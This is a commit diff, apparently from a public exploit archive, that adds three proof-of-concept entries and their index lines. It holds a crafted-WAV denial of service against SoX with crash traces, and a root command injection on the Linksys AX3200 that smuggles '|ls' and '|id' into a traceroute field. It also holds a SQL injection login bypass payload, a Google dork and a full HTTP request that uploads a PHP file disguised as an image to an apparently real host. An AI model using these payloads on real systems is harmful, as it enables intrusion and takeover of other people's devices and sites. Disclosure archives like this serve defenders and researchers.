DB: 2023-03-23

4 changes to exploits/shellcodes/ghdb SoX 14.4.2 - Denial Of Service Linksys AX3200 V1.1.00 - Command Injection VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
2023-03-23 00:16:30 +00:00 · 2023-03-23 00:16:30 +00:00 · 6206f4f208
commit 6206f4f208
parent 7d85ccf96b
4 changed files with 165 additions and 0 deletions
--- a/exploits/hardware/dos/51034.txt
+++ b/exploits/hardware/dos/51034.txt
@ -0,0 +1,77 @@
 # Exploit Title: SoX 14.4.2 - Denial Of Service
 # Exploit Author: LiquidWorm
 Vendor: Chris Bagwell
 Product web page: http://sox.sourceforge.net
                  https://en.wikipedia.org/wiki/SoX
 Affected version: <=14.4.2
 Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
 tools: it can convert sound files between many different file formats and
 audio devices, and can apply many sound effects and transformations, as well
 as doing basic analysis and providing input to more capable analysis and
 plotting tools.
 Desc: SoX suffers from a division by zero attack when handling WAV files,
 resulting in denial of service vulnerability and possibly loss of data.
 Tested on: Ubuntu 18.04.6 LTS
           Microsoft Windows 10 Home
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2022-5712
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
 CWE ID: 369
 CWE URL: https://cwe.mitre.org/data/definitions/369.html
 05.09.2022
 --
 PoC:
 https://zeroscience.mk/codes/sox_div0.wav.zip
 ---
 $ ./sox div0.wav test.wav reverse
 Floating point exception (core dumped)
 ...
 Program received signal SIGFPE, Arithmetic exception.
 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
 (gdb) bt
 #0  0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
 #1  0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav")
    at formats.c:545
 #2  0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945
 ...
 Program received signal SIGFPE, Arithmetic exception.
 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
 1457	        blocksWritten = MS_UNSPEC/wBlockAlign;
 (gdb) bt
 #0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
 #1  startwrite (ft=0x5555559a6a90) at wav.c:1252
 #2  0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0,
    signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912
 #3  0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>)
    at formats.c:948
 #4  0x000055555556b620 in open_output_file () at sox.c:1557
 #5  process () at sox.c:1754
 #6  main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008
 (gdb) bt full
 #0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
        wFormatTag = 1
        dwAvgBytesPerSec = 0
        dwFactSize = 4
        bytespersample = <optimized out>
        blocksWritten = <error reading variable blocksWritten (Division by zero)>
        dwSamplesWritten = 0
 ...
--- a/exploits/hardware/webapps/51035.txt
+++ b/exploits/hardware/webapps/51035.txt
@ -0,0 +1,16 @@
 # Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
 # Date: 2022-09-19
 # Exploit Author: Ahmed Alroky
 # Author: Linksys
 # Version: 1.1.00
 # Authentication Required: YES
 # CVE : CVE-2022-38841
 # Tested on: Windows
 # Proof Of Concept:
 1 - login into AX3200 webui
 2 - go to diagnostics page
 3 - put "google.com|ls" to perform a traceroute
 4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
--- a/exploits/php/webapps/51033.txt
+++ b/exploits/php/webapps/51033.txt
@ -0,0 +1,69 @@
 # Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
 # Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"
 # Date: [18/09/2022]
 # Exploit Author: [Edd13Mora]
 # Vendor Homepage: [www.viaviweb.com]
 # Version: [N/A]
 # Tested on: [Windows 11 - Kali Linux]
 ------------------
 SQLI on the Login page
 ------------------
 payload --> admin' or 1=1-- -
 ---
 POC:
 ---
 [1] Disable JavaScript on ur browser put the payload and submit
 [2] Reactive JavaScript and resend the request
 ---------------------------
 Authenticated SQL Injection:
 ---------------------------
 Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
 -----------------------------------------------
 Remote Code Execution (RCE none authenticated):
 -----------------------------------------------
 Poc:
 ----
 Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
 --------------------
 Burp Request :
 --------------------
 POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
 Host: http://googlezik.freehostia.com
 Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
 Content-Length: 467
 Origin: http://googlezik.freehostia.com
 Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 Te: trailers
 -----------------------------33893919268150571572221367848
 Content-Disposition: form-data; name="category_id"
 1
 -----------------------------33893919268150571572221367848
 Content-Disposition: form-data; name="image[]"; filename="poc.php"
 Content-Type: image/png
 <?php phpinfo(); ?>
 -----------------------------33893919268150571572221367848
 Content-Disposition: form-data; name="submit"
 -----------------------------33893919268150571572221367848--
 Uploaded File can be found here :
 --------------------------------
 http://localhost/PAth-Where-Script-Installed/categories/
 ```
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3165,6 +3165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware,,2005-05-26,2013-05-26,1,,,,,,https://www.securityfocus.com/bid/13782/info
 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,,2018-02-28,2018-04-25,0,,Console,,http://www.exploit-db.com/screenshots/idlt44500/screenshot.png,,https://github.com/ALEXZZZ9/PS4-5.01-WebKit-Exploit-PoC/tree/bf295a89c4f78164275c024710540662e0bce83b
 1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",dos,hardware,,2006-02-05,,1,OSVDB-23055;CVE-2006-0671,,,,,
 51034,exploits/hardware/dos/51034.txt,"SoX 14.4.2 - Denial Of Service",2023-03-22,LiquidWorm,dos,hardware,,2023-03-22,2023-03-22,0,,,,,,
 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000,2019-01-28,2019-01-28,0,CVE-2019-6973,"Denial of Service (DoS)",,,,
 28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",dos,hardware,,2006-07-15,2013-09-17,1,CVE-2006-3787;OSVDB-27337,,,,,https://www.securityfocus.com/bid/18996/info
 40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,dos,hardware,,2016-11-02,2016-11-09,0,,,,,,
@ -4431,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,,2014-07-24,2014-07-24,0,OSVDB-109522;OSVDB-109521;OSVDB-109520;OSVDB-109519;OSVDB-109518,,,,,
 40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",webapps,hardware,,2016-11-02,2016-11-02,0,,,,,,https://github.com/XiphosResearch/exploits/tree/master/deathsize
 47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,,2019-11-13,2019-11-13,0,,,,,,
 51035,exploits/hardware/webapps/51035.txt,"Linksys AX3200 V1.1.00 - Command Injection",2023-03-22,"Ahmed Alroky",webapps,hardware,,2023-03-22,2023-03-22,0,CVE-2022-38841,,,,,
 24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware,,2013-02-11,2013-02-11,1,OSVDB-89916;OSVDB-89915;OSVDB-89914;OSVDB-89913;OSVDB-89912;OSVDB-89911;CVE-2013-2678,,,http://www.exploit-db.com/screenshots/idlt24500/screen-shot-2013-02-11-at-110220-am.png,,http://www.s3cur1ty.de/m1adv2013-004
 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,,2021-03-25,2021-03-25,0,CVE-2012-6708,,,,,
 49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,,2020-12-17,2020-12-17,0,,,,,,
@ -31181,6 +31183,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,,
 51033,exploits/php/webapps/51033.txt,"VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities",2023-03-22,Edd13Mora,webapps,php,,2023-03-22,2023-03-22,0,,,,,,
 6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,webapps,php,,2008-11-03,,1,OSVDB-54277;CVE-2008-6795,,,,,
 6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,webapps,php,,2008-11-03,2016-12-30,1,OSVDB-54277;CVE-2008-6795,,,,,
 36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49304/info